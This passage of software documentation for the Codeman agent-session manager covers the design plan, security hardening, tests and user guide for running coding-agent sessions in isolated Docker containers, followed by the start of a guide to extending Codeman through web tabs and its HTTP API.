- Frontend `src/web/public/session-ui.js`: `formatCasePickerLabel` (48) + `buildCasePickerOptions` (71-73) handle `location === 'docker'` (`name @ container`, add container/image to the search haystack); `resetCaseModalFields` (~1514) add a `dockerFields` array; `switchCaseModalTab` (1573/1580/1597) handle `'case-docker'`; `submitCaseModal` add the docker branch; new `linkDockerCase()` (mirror `linkRemoteCase` at 1689) POSTing `/api/docker-hosts` then `/api/cases/docker-link`, sending omitted optionals as `undefined` (spread `...(x ? {x} : {})`, never `null`, per the Zod `.optional()`-rejects-null gotcha); `runClaude` (520) / `runShell` (702) extend the `location === 'remote'` routing to also match `'docker'`; `runOpenCode`/`runCodex`/`runGemini` (792/846/900) make the `isRemote` checks `isRemoteOrDocker` so local status probes are skipped. In the session-options Summary tab, note that `effort` is inert for docker (rejected) while `model` IS honored via `settings.local.json`.
|
||||
- Frontend `src/web/public/panels-ui.js` (425-426): add `caseItem?.docker?.path`/`container` to the case-search fields.
|
||||
|
||||
Schemas (`src/web/schemas.ts`), mirroring `RemoteHostSchema` (299) / `RemoteCaseLinkSchema` (351):
|
||||
|
||||
```ts
|
||||
export const DockerHostSchema = z.object({
|
||||
id: z.string().regex(/^[a-zA-Z0-9_-]+$/, 'Invalid docker host id'),
|
||||
label: z.string().min(1).max(100),
|
||||
engine: z.enum(['docker', 'podman']).optional(),
|
||||
image: z.string().min(1).max(512).regex(/^[a-zA-Z0-9][\w./:@-]*$/, 'Invalid image ref').regex(NO_SHELL_META),
|
||||
daemonHost: z.string().max(512).regex(NO_SHELL_META, 'Invalid daemon host').optional(),
|
||||
context: z.string().max(128).regex(/^[a-zA-Z0-9._-]+$/, 'Invalid context').optional(),
|
||||
network: z.enum(['bridge', 'none', 'custom']).optional(),
|
||||
networkName: z.string().max(128).regex(/^[a-zA-Z0-9][a-zA-Z0-9_.-]+$/).optional(),
|
||||
resources: z.object({
|
||||
memory: z.string().regex(/^\d+[bkmg]?$/i).optional(),
|
||||
cpus: z.string().regex(/^\d+(\.\d+)?$/).optional(),
|
||||
pidsLimit: z.number().int().positive().max(100000).optional(),
|
||||
nofile: z.string().regex(/^\d+:\d+$/).optional(),
|
||||
shmSize: z.string().regex(/^\d+[bkmg]?$/i).optional(),
|
||||
}).strict().optional(),
|
||||
mountCredentials: z.boolean().optional(),
|
||||
hooksEnabled: z.boolean().optional(),
|
||||
resumeOnStart: z.boolean().optional(),
|
||||
commands: RemoteCommandOverridesSchema, // reuse the shared shape
|
||||
extraCreateArgs: z.array(z.string().min(1).max(1024).regex(NO_SHELL_INJECTION).refine(noCommandSubstitution)).max(32).optional(),
|
||||
extraExecArgs: z.array(z.string().min(1).max(1024).regex(NO_SHELL_INJECTION).refine(noCommandSubstitution)).max(32).optional(),
|
||||
});
|
||||
|
||||
export const DockerCaseLinkSchema = z.object({
|
||||
name: z.string().regex(/^[a-zA-Z0-9_-]+$/, 'Invalid case name format'),
|
||||
hostId: z.string().regex(/^[a-zA-Z0-9_-]+$/, 'Invalid docker host id'),
|
||||
hostWorkspacePath: z.string().min(1).max(2000).regex(/^\//, 'Path must be absolute').regex(NO_SHELL_META, 'Invalid characters in workspace path'),
|
||||
containerWorkdir: z.string().min(1).max(2000).regex(/^\//).regex(NO_SHELL_META).optional(),
|
||||
container: z.string().min(2).max(128).regex(/^[a-zA-Z0-9][a-zA-Z0-9_.-]+$/, 'Invalid container name').optional(),
|
||||
});
|
||||
```
|
||||
|
||||
`NO_SHELL_META` (rejects `$`/backtick, schemas.ts:297) is REQUIRED on `image`, `hostWorkspacePath`, `containerWorkdir`, and `container`, because all four reach the outer `bash -c "..."` double-quote layer where `$(...)`/backtick re-expose, exactly the reason `remotePath`/`identityFile` use it. `--privileged` and any `-v /var/run/docker.sock` are structurally unrepresentable (never emitted by the builder, never accepted by the schema).
|
||||
|
||||
## 7. Security model
|
||||
|
||||
- Hardening flags on every create: `--cap-drop ALL`, `--security-opt no-new-privileges` (NOT auto-set by rootless Docker or Podman, so always explicit), the uid/userns branch of Key decision 6 (never container-root; workspace files stay host-owned and HOME stays writable via GID 0), `--pids-limit` (fork-bomb guard), `--memory` with `--memory-swap == --memory` (real OOM cap), `--ulimit nofile`, `--init`, `--pull=never`. NEVER `--privileged`, NEVER mount the docker socket into the agent container. `--storage-opt size=` is emitted ONLY after the probe confirms overlay2-on-xfs-pquota or btrfs (the AICE-class silently-ignored trap); otherwise it is omitted and the UI does not advertise a size cap. Resource caps are advertised as ENFORCED only when the probe reports `capsEnforced:true`; under non-delegated rootless they are labeled advisory (user-decision 6).
|
||||
- Engine: prefer whichever the probe finds, Podman-rootless first for security (a container-root breakout lands as an unprivileged host user). Rootless bind-mount ownership uses `--userns=keep-id` (Podman) vs `--user <hostUid>:0` (Docker), so real per-engine branching lives in `buildDockerCreateArgs`. Docker Desktop takes its own uid path (Key decision 6).
|
||||
- Blast radius (the combined-posture the critic asked to surface, user-decision 5): the default convenient profile mounts an arbitrary host workspace dir RW (host-owned, mirrored path) AND host `~/.claude`/`~/.codex`/`~/.gemini`/`~/.config/gcloud`/`~/.config/opencode` RW into a NETWORK-ENABLED container. Container-run agent code can therefore read/modify those host trees and reach the network simultaneously. This is still a strict improvement over today's on-host skip-permissions execution, but the user must accept the combined posture explicitly; the sealed profile plus `network:none` is the mitigation for genuinely untrusted work.
|
||||
- Secret handling: creds arrive ONLY as bind-mounted files (default) or exec-time NAME-ONLY `--env` (codex/gemini keys), NEVER as create-time `-e` and NEVER as an image layer. Sealed-mode export is refuse-or-scrub (Section 5), closing the sealed-leak inversion.
|
||||
- CLAUDE.md "Multi-CLI prefix discipline": the exec-time name-only env is restricted to the CLI-specific keys per mode (Claude: none with OAuth mount; Codex: `OPENAI_API_KEY`/`CODEX_API_KEY`; Gemini: `GEMINI_API_KEY`/`GOOGLE_*`), never a blanket forward. `envOverrides` is rejected for docker, so the `ALLOWED_ENV_PREFIXES` allowlist is not widened.
|
||||
- hook-secret: bind-mounted read-only, referenced via `CODEMAN_HOOK_SECRET_FILE` (a path, non-secret); the secret bytes never enter env or the image. Both `host.docker.internal` and `host.containers.internal` are added to the host-guard allowlist so the in-container hook curl's Host header passes on either engine.
|
||||
- Host guard / instance isolation: the in-container tmux socket (`codeman-docker`) and name (`codeman-dkr-<id8>`) deliberately FAIL a container-internal Codeman's `SAFE_MUX_NAME_PATTERN`, so a nested Codeman never adopts our session (unit-asserted). The boot reaper is instance-scoped by the `codeman.instance` label so a beta never reaps prod. Any remote-daemon (`-H`/`--context`) mode is host-root-equivalent and stays strictly behind the existing auth/loopback/host-guard/Origin-CSRF stack.
|
||||
- Import containment: untrusted bundles are checksum-validated, extracted with traversal guards, and loaded into a quarantined image namespace (never overwriting the base image), then run with the same hardening.
|
||||
|
||||
## 8. Phased implementation (branch: `feat/docker-session-mode`)
|
||||
|
||||
Each phase is independently testable; per CLAUDE.md, end-to-end test in the real env before COM. All new docker IO paths carry `const IS_TEST_MODE = !!process.env.VITEST;` and no-op under it; the pure command builders are tested directly.
|
||||
|
||||
- Phase 0: base image + engine probe. Author `docker/agent.Dockerfile` (OpenShift arbitrary-uid HOME) and `scripts/build-agent-image.mjs` (build or pull the base image; digest recorded). Add `checkDockerAvailable`/`checkDockerTmuxAvailable`/`containerApiUrl`/`hostGatewayAlias` (IS_TEST_MODE no-op) and `GET /api/docker/status`. Test: probe stub returns available/caps/Desktop flags under VITEST; `containerApiUrl` preserves scheme+port and swaps host per engine; status route returns the envelope.
|
||||
- Phase 1: types + storage + schemas. Add all types (Section 3), `src/docker-hosts.ts`, `DockerHostSchema`/`DockerCaseLinkSchema`. Test: `docker-hosts.test.ts` (round-trip incl. `lastClaudeSessionId`, display path, config-hash stability); `docker-exec-options.test.ts` (schema rejects `$`/backtick in image/workdir/container).
|
||||
- Phase 2: tmux-manager builders. Add `DOCKER_TMUX_SOCKET`, `dockerTmuxSessionName`, `buildDockerLaunchCommand` (resume-aware, image-check, env-prime), `buildDockerKillCommand`; wire the two ternaries + two cd-skips + Strategy 3c; harden `reconcileSessions` against docker hard-delete. Test (pure strings): adopt-proof name fails `SAFE_MUX_NAME_PATTERN`; image-check precedes create; `new-session -A` idempotent; resume flag present only when a resume id is passed; `--pull=never` present; instance label present; escaping survives `bash -c` -> `docker exec` -> `sh -lc` -> tmux WITH a host workspace path containing spaces.
|
||||
- Phase 3: session.ts + mux + recovery. Add `_docker` + `resumeSessionId` threading, in-container cliVersion probe, `resolveMuxAttachCwd`, mux-interface fields, `restoreMuxSessions` passthrough, instance-scoped reaper wiring, claudeSessionId -> `DockerCase.lastClaudeSessionId` persistence, unified flag. Test: `toState()` emits docker; a persisted docker session round-trips through mux/state; a relaunch injects the persisted resume id (mock mux); reaper only targets this instance's orphaned containers.
|
||||
- Phase 4: routes + first real e2e. case-routes CRUD + listing + drift-recreate; session-routes quick-start branch (scaffolding RUNS, local-availability guards skip, model accepted, effort/config rejected). Manual e2e on a real docker host: docker-host create -> docker-link -> quick-start; confirm the pane runs `claude` in the container, files land host-owned, a Codeman restart reattaches the SAME live agent, and a `docker stop` followed by relaunch RESUMES the conversation.
|
||||
- Phase 5: hooks connectivity + installation. host-gateway (per engine), derived `CODEMAN_API_URL`, hook-secret mount, `CODEMAN_SESSION_ID`/`CODEMAN_MUX` exec-env + tmux setenv, host-guard allowlist, and the scaffolding write into the real workspace. Manual e2e: trigger a permission prompt from inside the container and confirm it surfaces; verify hook payloads carry the right session id. If deferred, ship docker as explicitly hook-degraded and verify output-based idle detection through the docker-exec PTY.
|
||||
- Phase 6: export/import + GC + disk safety. quiesce+pause span, free-space precheck, commit+save+gzip + workspace tar + manifest + streaming download; sealed-mode refuse-or-scrub; retention/auto-prune; import with checksum validation + traversal guard + quarantined re-tag; drift-recreate; boot reaper; `runWithConversionLimit` cap; `docker rmi` in finally. Manual e2e: export, `docker load` on a second machine (or fresh case), import, confirm toolchain + workspace restored and NO creds present; attempt a sealed full-image export and confirm it is refused-or-scrubbed; attempt a `../` bundle and confirm it is rejected.
|
||||
- Phase 7: frontend. Docker tab, `linkDockerCase`, run wiring, case-picker labels, panels search, caps-advisory + scaffold-warning + effort-inert notes. Verify with Playwright (`waitUntil: 'domcontentloaded'`, 3-4s settle) that the Docker tab renders and a linked docker case appears in the picker.
|
||||
- Phase 8: docs + COM. Update CLAUDE.md (a "Docker cases" Key Pattern paragraph mirroring remote-SSH, plus the new state files, routes counts, and the resume/durability model), `docs/docker-cases.md`, then COM per the standard flow.
|
||||
|
||||
## 9. Test plan
|
||||
|
||||
- Unit (pure, CI-safe, mirror `test/remote-hosts.test.ts` / `test/remote-ssh-options.test.ts`):
|
||||
- `test/docker-hosts.test.ts`: storage round-trip (incl. `lastClaudeSessionId`), `dockerDisplayPath`, `defaultDockerCommandForMode`, `toSessionDocker`, `containerApiUrl` (http/https, custom port, docker vs podman gateway), config-hash stability/drift, `buildDockerCreateArgs` flag ordering (cap-drop/no-new-privileges/memory==memory-swap/instance-label/`--pull=never` present; host/privileged/socket absent; per-engine uid vs `--userns=keep-id`).
|
||||
- `test/docker-exec-options.test.ts`: `buildDockerLaunchCommand`/`buildDockerKillCommand` string shape and escaping through `bash -c` -> `docker exec` -> `sh -lc` -> tmux, including a workspace path with spaces; resume flag present only with a resume id; image-presence check precedes create; `dockerTmuxSessionName` fails `SAFE_MUX_NAME_PATTERN`; schema rejects `$`/backtick in image/workdir/container/name; `linkDockerCase`-shaped bodies with omitted optionals validate (no `null` on the wire).
|
||||
- Probe no-op: `checkDockerAvailable`/`checkDockerTmuxAvailable`/`probeDockerCliVersion` return canned values under VITEST and never spawn.
|
||||
- Integration (route tests via `app.inject()`, docker no-op'd): `/api/docker-hosts` CRUD; `/api/cases/docker-link` dup-check + broadcast; `GET /api/cases` includes the docker case with `location: 'docker'`; `/api/quick-start` docker branch rejects `envOverrides`/`effort`/config but ACCEPTS `modelOverride`, runs the workspace-scaffolding path, and constructs a session with `docker` set + seeded resume id; `DELETE /api/cases/:name` docker-unlink; export refuse-or-scrub for sealed; import traversal rejection; reaper instance-scoping (label filter). Pick a unique port only if a live-server test is added (search `const PORT =`; 3150+).
|
||||
- Manual end-to-end (real docker daemon, the mandatory "always end-to-end test" gate): build the base image; link a docker case; quick-start `claude`; verify OAuth via the mounted `~/.claude`, transcript correlation (subagent/workflow watchers show the session), host-owned files, and a working permission-prompt hook; reattach after a Codeman PROCESS restart (SAME live agent); `docker stop` then relaunch and confirm conversation RESUME; reboot-equivalent (daemon restart) and confirm boot recovery recreates+resumes; change the host's memory/image and confirm the drift-recreate prompt fires; export (convenient) and confirm the tar `docker load`s with no creds; attempt a sealed full-image export and confirm refuse-or-scrub; import into a fresh case; delete the case and confirm `docker rm -f` plus instance-scoped reaper GC; confirm a docker-down state surfaces a docker-specific error and does NOT trip the generic PTY-exit breaker.
|
||||
|
||||
## 10. Open decisions for the user
|
||||
|
||||
1. Credential + blast-radius posture (combined). Convenient default bind-mounts host `~/.claude` etc. RW AND an arbitrary host workspace RW into a network-enabled container, so container-run agent code can read/modify those host trees and reach the network at the same time. Recommended: convenient default plus a per-host SEALED opt-in (`mountCredentials:false` + `network:none`) for untrusted work. Please confirm you accept the combined arbitrary-workspace-plus-egress-plus-host-creds posture for the default profile (it is still a net improvement over today's on-host skip-permissions execution).
|
||||
2. Base image ownership, registry, and freshness. The `codeman/agent:base` placeholder implies a Docker Hub org the project may not own. Pick the real registry/namespace (GHCR under the repo is the natural fit), decide digest pinning, and set a REBUILD CADENCE so agents are not stuck on a stale baked `claude` (the in-container version probe surfaces staleness, but something must trigger rebuilds). Choose: pull a pinned published image, build locally on first use via `scripts/build-agent-image.mjs`, or both.
|
||||
3. Container CWD strategy. Mirror the host workspace path inside the container (recommended: makes transcript projHash correlate, file features and resume capture work) vs a fixed `/workspace` (simpler mount, breaks watcher correlation). Please confirm the mirror approach.
|
||||
4. Hooks in the MVP AND workspace scaffolding. Making docker hooks fire requires WRITING `.claude/settings.local.json` (and the CLAUDE.md scaffold) into the user's REAL linked host directory, a behavioral shift from "link a dir" to "link and scaffold a dir." Choose: wire hooks + scaffolding now (Phase 5, recommended, and it also enables the model picker), or ship docker as explicitly hook-degraded (no permission prompts / hook-idle) for v1 and add later. Confirm you are OK with Codeman mutating the linked host workspace.
|
||||
5. Session-kill teardown and RESUME (reframed honestly). `docker stop` on session kill is not merely "free RAM vs instant reattach": it destroys the in-container live agent, and the conversation survives ONLY because the next launch runs `--resume` from the bind-mounted transcript. Choose: keep the container running (costs RAM, preserves the exact live in-flight agent) vs stop and rely on `--resume` (frees RAM, may lose uncommitted in-flight tool state). Case-delete always `docker rm -f`.
|
||||
6. Rootless enforcement posture. Under rootless without cgroup-v2 systemd delegation, `--memory`/`--cpus`/`--pids-limit` are SILENTLY ignored. Choose: REQUIRE delegation (refuse to link a host that cannot enforce caps) or ship-with-warning ("resource caps are advisory on your engine"). The probe reports `capsEnforced` either way.
|
||||
7. Default resume behavior. Should a re-linked or re-run docker case default to resuming its last conversation (`resumeOnStart:true`, using `DockerCase.lastClaudeSessionId`) rather than starting clean? This is the crux of making the durability story real and is the recommended default, but it changes user-visible behavior (a new session in an existing case continues the prior conversation).
|
||||
8. Export defaults and disk budget. Default export button: workspace-only (fast, small, files-only, recommended for 24h+ runs) vs full-image (reproducible env, multi-GB). Also set the retention cap (max retained exports), the auto-prune policy, and the free-space threshold below which export is refused (a full `/var/lib/docker` breaks EVERY session on the host, not just docker ones).
|
||||
9. Remote docker daemon (`-H ssh://...` / `--context`). Support in the MVP (composes with remote hosts, adds host-root trust surface) or local-daemon-only first.
|
||||
10. Podman parity depth. Full `--userns=keep-id` plus Quadlet boot-persistence, or Docker-first with Podman as best-effort and boot-persistence via Codeman's idempotent create-if-missing only. Note the podman host alias is `host.containers.internal`, already handled per engine.
|
||||
@@ -0,0 +1,110 @@
|
||||
# Docker cases
|
||||
|
||||
Run a case inside an **isolated Docker container** instead of directly on the host. Any number of Codeman sessions can share one container (it is scoped to the case, not the session), so a whole project lives in a sandbox with its own network, resource caps, and filesystem, and you can **export the container to move it to another machine**.
|
||||
|
||||
Docker mode is a **location overlay on cases**, the direct analog of [remote SSH cases](./remote-hosts.md): where a remote case runs a local tmux pane doing `ssh host` into a durable remote tmux server, a docker case runs a local tmux pane doing `docker exec -it` into a durable **in-container** tmux server. It is not a separate `SessionMode`, so `claude` / `shell` / `opencode` / `codex` / `gemini` / `antigravity` all work inside the container.
|
||||
|
||||
## One-time setup: build the base image
|
||||
|
||||
The container needs a base image with the agent toolchain (node, the CLIs, git, tmux). Build it locally once:
|
||||
|
||||
```bash
|
||||
node scripts/build-agent-image.mjs # builds codeman/agent:base
|
||||
# options: --engine docker|podman --image <ref> --no-cache
|
||||
```
|
||||
|
||||
The image is **secret-free**: credentials are delivered at runtime (bind mounts or `docker exec --env`), never baked in, so exports never leak them.
|
||||
|
||||
⚠️ **Re-build with `--no-cache`, always.** The CLIs are installed in a single `RUN npm install -g` layer, so a plain rebuild re-uses it from the Docker layer cache and the CLIs stay frozen at whatever versions the image was **first** built with, however long ago that was. Editing the Dockerfile does not help unless the edit lands at or above that line: a change appended below it leaves the npm layer cached and only runs the new step. Observed 2026-08-06: a rebuild silently kept a stale `@openai/codex@0.144.6` whose aliased platform binary had not installed, so every `codex` docker case died with `Missing optional dependency @openai/codex-linux-x64` while the build itself reported success.
|
||||
|
||||
```bash
|
||||
node scripts/build-agent-image.mjs --no-cache
|
||||
```
|
||||
|
||||
A zero exit code only proves the layers ran, not that the toolchain works. Verify by actually executing each CLI in the image, and check the build log for `Using cache` lines:
|
||||
|
||||
```bash
|
||||
docker run --rm codeman/agent:base bash -lc \
|
||||
'for c in claude codex gemini opencode agy; do printf "%-9s " $c; $c --version 2>&1 | head -1; done'
|
||||
```
|
||||
|
||||
Antigravity (`agy`) is the one CLI not installed from npm (Google ships a standalone binary), so it has its own Dockerfile step and adds roughly 190MB; a full image lands near 1.6GB.
|
||||
|
||||
## Quickest path: one-click "Run in Docker"
|
||||
|
||||
On the **New case → Create New** tab there's a **🐳 Run in an isolated Docker container** checkbox. Checking it alone is enough: Codeman creates the case folder in `~/codeman-cases/<name>`, spins up a hardened container with sensible defaults (auto-provisioning a shared `default` host), and starts the session inside it. No host/image/network fields to fill in.
|
||||
|
||||
Click the checkbox's **Container settings** to optionally tweak the predefined defaults, including a **Template** picker:
|
||||
|
||||
| Template | Memory | CPUs | GPUs |
|
||||
|----------|--------|------|------|
|
||||
| Small | 2 GB | 1 | none |
|
||||
| Medium (default) | 4 GB | 2 | none |
|
||||
| Large | 8 GB | 4 | none |
|
||||
| GPU | 8 GB | 4 | all (needs the NVIDIA container toolkit) |
|
||||
|
||||
**Disk is elastic** — the container's storage grows automatically as data flows in; there is no fixed cap (bounded only by host disk). Any tweaked setting creates a dedicated per-case host so it never changes the shared `default`.
|
||||
|
||||
## Create a docker case (full control)
|
||||
|
||||
App → **New case → Docker** tab:
|
||||
|
||||
- **Case Name** / **Workspace Path**: the workspace is a real HOST directory bind-mounted into the container at the same path. Codeman scaffolds `CLAUDE.md` + `.claude/settings.local.json` (hooks) into it, and file previews / attachments work on the real bytes.
|
||||
- **Host ID**: a reusable docker host profile (image, network, resources). Reuse the same ID across cases to share settings.
|
||||
- **Network**: `bridge` (internet on, default), `none` (fully isolated), or a `custom` bridge.
|
||||
- **Advanced**: memory / CPU caps, **Mount host credentials** (on = your existing `~/.claude` login just works; off = a sealed sandbox you log into inside the container), **Resume last conversation on relaunch**.
|
||||
|
||||
Then run it like any case (Run Claude / Run Shell / …). The first launch creates the container (`codeman-case-<name>`); subsequent sessions attach to the same one.
|
||||
|
||||
Equivalent API:
|
||||
|
||||
```bash
|
||||
curl -X POST localhost:3000/api/docker-hosts -d '{"id":"local","label":"Local","image":"codeman/agent:base"}'
|
||||
curl -X POST localhost:3000/api/cases/docker-link -d '{"name":"sandbox","hostId":"local","hostWorkspacePath":"/home/you/projects/sandbox"}'
|
||||
curl -X POST localhost:3000/api/quick-start -d '{"caseName":"sandbox","mode":"claude"}'
|
||||
```
|
||||
|
||||
## Lifecycle
|
||||
|
||||
- **Reconnect after a Codeman restart** lands back in the same live agent (the in-container tmux survives).
|
||||
- **Container stop / host reboot** restarts the container and **resumes** the last conversation from the bind-mounted transcript. Claude sessions launch with a pinned conversation id (`--session-id <sessionId>`, with a `--resume` fallback when the transcript already exists), and the case remembers its last conversation (`lastClaudeSessionId`), so a relaunch after the container was stopped, rebooted, or recreated continues where it left off.
|
||||
- **Killing one session** only kills that session's in-container tmux session; the shared container stays up for sibling sessions.
|
||||
- **Editing the docker host config** (image, memory, network, ...) is detected on the next launch: the desired config hash is compared against the container's `codeman.confighash` label, and a mismatch refuses the launch with a "config changed, recreate?" confirm. Confirming calls `POST /api/docker-cases/:name/recreate` (refused while sessions of the case are live), which removes the container so the next launch recreates it with the new config; the workspace and the conversation survive.
|
||||
- **Deleting the case** `docker rm -f`s the container (the bind-mounted workspace on the host survives). An instance-scoped boot reaper removes containers whose case is gone.
|
||||
|
||||
## Isolation & security
|
||||
|
||||
Every container runs hardened: `--cap-drop ALL`, `--security-opt no-new-privileges`, non-root (`--user <hostUid>:0` so workspace files stay host-owned), `--pids-limit`, `--memory` == `--memory-swap`, `--init`. Never `--privileged`, never the docker socket. The default **convenient** profile bind-mounts host credential dirs read-write so the common login just works (creds stay on the host, never captured by `docker commit`); the **sealed** profile (`mountCredentials:false` + `network:none`) is the opt-in for genuinely untrusted work.
|
||||
|
||||
Rootless engines without cgroup-v2 systemd delegation cannot enforce resource caps; linking such a host warns that caps are advisory.
|
||||
|
||||
## Export / Import (move to another machine)
|
||||
|
||||
**Export** (from the Docker tab, or `POST /api/docker-cases/:name/export`): choose
|
||||
|
||||
- **Full image + workspace**: `docker commit` the container to an image, `docker save` it, tar the workspace, and a manifest, all into one portable `<case>-<ts>.codeman-container.tgz` (the whole toolchain, installed packages, and files). Runs in the background; you are notified when the bundle is ready.
|
||||
- **Workspace only**: just the project files (fast, small).
|
||||
|
||||
The container is paused across the capture so the image and workspace are consistent; a full `/var/lib/docker` is guarded against with a free-space precheck; the intermediate image is always cleaned up.
|
||||
|
||||
**Import** (`POST /api/docker-cases/import`, or the Manage tab): copy the `.tgz` onto the new machine's `~/.codeman/docker-exports/`, then import it into a new case. The manifest and per-member SHA-256 checksums are validated, the workspace tar is extracted with a path-traversal guard, and the image is `docker load`ed and **re-tagged into a quarantined namespace** (`codeman/imported-<case>:<ts>`) so it never overwrites a local tag. The destination supplies its own credentials, so nothing secret crosses machines.
|
||||
|
||||
`GET /api/docker-exports` lists bundles; `GET /api/docker-exports/:filename` downloads one; `DELETE` removes one.
|
||||
|
||||
## Hooks require the server to be reachable from the container
|
||||
|
||||
In-container hooks (permission events, hook-based idle/stop/task notifications) POST to `CODEMAN_API_URL`, which is derived as `https://host.docker.internal:<port>` (`host.docker.internal` → the docker bridge gateway, e.g. `172.17.0.1`, via `--add-host …:host-gateway`). For that callback to succeed, the Codeman server must be **listening on an interface the container can reach**.
|
||||
|
||||
- If Codeman binds **loopback-only** (`127.0.0.1`, the default and the production systemd config), a container reaching `172.17.0.1:<port>` cannot connect, so by default **in-container hooks do not fire**. The session still works fully: idle/stop detection falls back to **output-based** detection through the `docker exec` PTY (which always works), and claude runs with `--dangerously-skip-permissions` so there are no permission prompts to forward anyway.
|
||||
- **To enable in-container hooks on a loopback-only server, set `CODEMAN_DOCKER_BRIDGE_HOOKS=1`** (env). Codeman then starts a SECOND listener bound to the docker bridge gateway (`172.17.0.1`, auto-detected; override with `CODEMAN_DOCKER_BRIDGE_HOST`) that serves **only the hook endpoints** (`/api/hook-event`, `/api/status-telemetry`) and delegates them into the same secret-gated pipeline. The bridge is host-internal (containers + host, not the LAN), and every other path returns `403`, so this does not widen your network exposure. Add `Environment=CODEMAN_DOCKER_BRIDGE_HOOKS=1` to the systemd unit and restart.
|
||||
- Alternatively, bind `0.0.0.0` **with `CODEMAN_PASSWORD` set** (exposes on the LAN too).
|
||||
|
||||
The host-gateway mapping, `CODEMAN_API_URL` derivation, host-guard allowlist, and hook-secret mount are all wired correctly; `CODEMAN_DOCKER_BRIDGE_HOOKS` closes the last gap for loopback-only servers.
|
||||
|
||||
## Notes & limits
|
||||
|
||||
- Requires Docker (or Podman) with a reachable daemon; tmux must be present in the base image (a hard prerequisite, probed at link time).
|
||||
- Per-session `envOverrides` / `effort` / per-CLI config are rejected for docker cases (they do not cross into the container); configure the container via the docker host's per-mode command override instead.
|
||||
- macOS Docker Desktop takes a dedicated uid path (the baked image uid; memory caps are subject to the VM ceiling).
|
||||
|
||||
Design + rationale: [`docker-cases-plan.md`](./docker-cases-plan.md).
|
||||
@@ -0,0 +1,417 @@
|
||||
# Extending Codeman
|
||||
|
||||
Codeman has no plugin runtime, and that is a deliberate choice rather than a
|
||||
missing feature. A plugin runtime means running third-party code inside a process
|
||||
that spawns agents with your credentials, on a server people routinely expose
|
||||
over a tunnel or Tailscale. Codeman's security model is one of its reasons to
|
||||
exist, so it does not hand that away for an extension mechanism.
|
||||
|
||||
Instead there are four seams that already work, from any language, with nothing
|
||||
installed:
|
||||
|
||||
| You want to | Use | Runs where |
|
||||
| --- | --- | --- |
|
||||
| Show your own UI inside Codeman | [Web tabs](#seam-1-web-tabs) | Your own process, rendered as a tab |
|
||||
| React when an agent needs you | [SSE events](#seam-2-sse-events) | Anywhere that can hold an HTTP connection |
|
||||
| Drive Codeman from a script | [HTTP API](#seam-3-http-api-and-cli) or the `codeman` CLI | Anywhere |
|
||||
| React inside a Claude session | [Hooks](#seam-4-hooks) | The agent's own machine |
|
||||
|
||||
Everything below is covered by the stability promise in
|
||||
[`versioning-policy.md`](versioning-policy.md): endpoint paths, the response
|
||||
envelope, `errorCode` values, and SSE event names are stable. Additive changes
|
||||
(new endpoints, new optional fields, new events) are non-breaking. Breaking
|
||||
changes ship under a new prefix (`/api/v2`).
|
||||
|
||||
## Before you start
|
||||
|
||||
**Base URL.** `http://127.0.0.1:3000` by default. Prefer the versioned prefix
|
||||
`/api/v1/...` for anything you publish; the unversioned `/api/...` is an alias.
|
||||
|
||||
**Auth.** If `CODEMAN_PASSWORD` is set, send HTTP Basic on every request, or
|
||||
authenticate once and keep the `codeman_session` cookie. With no password set,
|
||||
Codeman is loopback-only and unauthenticated.
|
||||
|
||||
```bash
|
||||
curl -u admin:$CODEMAN_PASSWORD http://127.0.0.1:3000/api/v1/sessions
|
||||
```
|
||||
|
||||
**Envelope.** Every response is `{"success": true, "data": ...}` or
|
||||
`{"success": false, "error": "...", "errorCode": "..."}`. Check the HTTP status
|
||||
or `body.success`, then read `body.data`. The full `errorCode` to status mapping
|
||||
is in [`api-reference.md`](api-reference.md).
|
||||
|
||||
⚠️ A few legacy GETs (`/api/away-digest` among them) return a bare-ish body with
|
||||
the payload at the top level rather than under `data`. Read defensively with
|
||||
`body.data ?? body`.
|
||||
|
||||
⚠️ A `401` is not an envelope at all: auth is rejected in a request hook that
|
||||
replies with the bare string `Unauthorized`, so parsing it as JSON throws. Branch on
|
||||
the status code before you parse, or a missing password looks like a broken endpoint.
|
||||
|
||||
**Already driving Codeman from an agent?** The README's
|
||||
[Programmatic Guide](../README.md#driving-codeman-from-an-agent--programmatic-guide)
|
||||
covers the in-session case: the `CODEMAN_MUX`, `CODEMAN_API_URL`,
|
||||
`CODEMAN_SESSION_ID` and `CODEMAN_HOOK_SECRET_FILE` variables that let a CLI
|
||||
running inside Codeman find the API and avoid acting on itself. This page is for
|
||||
code running *outside* a session.
|
||||
|
||||
## Seam 1: Web tabs
|
||||
|
||||
The highest-leverage seam. Any web app you can serve locally becomes a tab beside
|
||||
your agent sessions. You write a normal web page; Codeman handles embedding it.
|
||||
|
||||
```bash
|
||||
curl -u admin:$PASS -X POST http://127.0.0.1:3000/api/v1/webviews \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"name":"My Dashboard","url":"http://127.0.0.1:8787","icon":"📊"}'
|
||||
```
|
||||
|
||||
Fields: `name` (1 to 60 chars), `url`, and optionally `icon` (a single glyph, max
|
||||
8 code units), `embedMode` (`proxy` by default, or `direct`), and `trusted`.
|
||||
|
||||
Related endpoints: `GET /api/v1/webviews`, `PATCH /api/v1/webviews/:id`,
|
||||
`DELETE /api/v1/webviews/:id`, `POST /api/v1/webviews/probe` (reachability and
|
||||
framing check), `POST /api/v1/webviews/:id/open`.
|
||||
|
||||
### Why it is proxied
|
||||
|
||||
By default your page is served through Codeman's own origin at `/webview/:cap/*`
|
||||
rather than framed directly. A direct iframe fails three ways at once: production
|
||||
is HTTPS so `http://` targets are blocked as mixed content, many dashboards send
|
||||
`X-Frame-Options: DENY`, and Codeman's own `default-src 'self'` CSP blocks
|
||||
cross-origin frames. Proxying solves all three without weakening the CSP.
|
||||
|
||||
### The two things that will confuse you
|
||||
|
||||
A proxied frame is sandboxed and therefore **opaque-origin** unless you set
|
||||
`trusted: true`. Two consequences look like bugs in your own app:
|
||||
|
||||
1. **Root-absolute URLs built at runtime** (`/assets/x.png` assembled in JS)
|
||||
escape the injected `<base>` tag. Codeman injects a `runtimeUrlShim()` that
|
||||
patches the common DOM sinks, but if you construct URLs in an unusual way,
|
||||
prefer relative paths.
|
||||
2. **Same-host `fetch` and `XHR` are CORS-checked with `Origin: null`.** Codeman
|
||||
handles this with `buildProxyCorsHeaders()`, and the proxy is exempt from the
|
||||
global `OPTIONS` short-circuit. If you see "Failed to fetch" while the page
|
||||
itself renders fine, this is the area to look at.
|
||||
|
||||
⚠️ `trusted: true` opts out of the sandbox. A proxied page is served from
|
||||
Codeman's origin, so `allow-same-origin` lets it read the Codeman page and call
|
||||
the API that spawns agents. Only mark your own trusted code.
|
